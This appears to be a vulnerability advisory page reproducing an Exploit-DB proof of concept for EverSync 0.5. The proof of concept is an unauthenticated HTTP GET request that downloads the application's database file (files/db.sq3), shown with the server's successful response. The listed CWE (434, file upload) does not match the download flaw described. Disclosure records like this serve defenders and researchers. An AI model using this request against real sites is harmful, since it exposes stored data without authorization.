EverSync 0.5 - Arbitrary File Download

vendor:

EverSync

by:

Ihsan Sencan

7.5

CVSS

HIGH

Arbitrary File Download

434

CWE

Product Name: EverSync

Affected Version From: 0.5

Affected Version To: 0.5

Patch Exists: NO

Related CWE: N/A

CPE: a:phpmassmail:eversync

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2018

EverSync 0.5 – Arbitrary File Download

EverSync 0.5 is vulnerable to arbitrary file download. An attacker can download the database file (db.sq3) by sending a GET request to the vulnerable URL.

Mitigation:

Restrict access to the vulnerable URL and ensure that the web application is running on the latest version of the software.

Source

Exploit-DB raw data:

# Exploit Title: EverSync 0.5 - Arbitrary File Download
# Dork: N/A
# Date: 2018-11-14
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://phpmassmail.sourceforge.io/
# Software Link: https://datapacket.dl.sourceforge.net/project/eversync/Downloads/alpha/EverSync-Pre-alpha05.zip
# Version: 0.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: Dztabase Download
# 1) 
# http://localhost/[PATH]/files/db.sq3
# 

GET /[PATH]/files/db.sq3 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=dhq0fbvco8d0sc0lem3l2kktk0
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Wed, 14 Nov 2018 19:47:32 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
Last-Modified: Wed, 14 Nov 2018 19:37:00 GMT
ETag: "3800-57aa50ed0a29c"
Accept-Ranges: bytes
Content-Length: 14336
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive